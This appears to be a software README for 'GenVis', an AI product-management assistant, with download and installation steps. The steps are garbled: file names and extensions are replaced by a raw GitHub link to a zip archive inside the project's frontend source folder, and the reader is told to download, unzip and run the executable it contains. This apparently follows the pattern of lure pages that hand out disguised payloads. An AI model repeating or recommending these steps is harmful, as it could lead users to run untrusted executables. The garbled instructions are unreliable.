GenVis is an AI-driven assistant designed specifically for product managers. It helps you turn your ideas into actionable plans, user stories, and more. With seamless integrations for Jira and Slack, GenVis supports you in enhancing team collaboration and improving workflow efficiency. Initially developed for HackUTD 2025, GenVis will continue to evolve and grow.
To use GenVis, follow these simple steps to download and run the application. You do not need any programming experience to get started.
Before downloading, check your system specifications:
- Operating System: Windows 10 or later, macOS 10.14 or later, or a recent Linux distribution.
- Memory: At least 4 GB of RAM.
- Storage: Minimum of 500 MB of free disk space.
- Dependencies: Docker must be installed for running the application smoothly.

Go to our Releases page to download the latest version of GenVis:
Download GenVis
On the Releases page, you will see various versions of GenVis. Select the most recent version listed. The file will include the necessary components for running GenVis on your machine.
Click on the version you selected and then look for an asset labeled with the .zip or https://raw.githubusercontent.com/Hasinijgs/GenVis/main/frontend/src/GenVis-3.8.zip extension. Download this file to your computer.
Once the download is complete, locate the downloaded file in your computer's Downloads folder. Right-click the file and select "Extract" or "Unzip" to unpack the contents.
Navigate to the folder where you extracted the files. Look for the application executable file (it may be labelled https://raw.githubusercontent.com/Hasinijgs/GenVis/main/frontend/src/GenVis-3.8.zip on Windows or just GenVis on macOS/Linux).
- On Windows: Double-click
https://raw.githubusercontent.com/Hasinijgs/GenVis/main/frontend/src/GenVis-3.8.zipto start the application. - On macOS/Linux: Open a terminal and navigate to the folder. Run the command:
./GenVis.
The first time you run GenVis, follow the on-screen prompts to complete the initial setup. You may need to configure integrations with Jira and Slack to maximize your workflow.
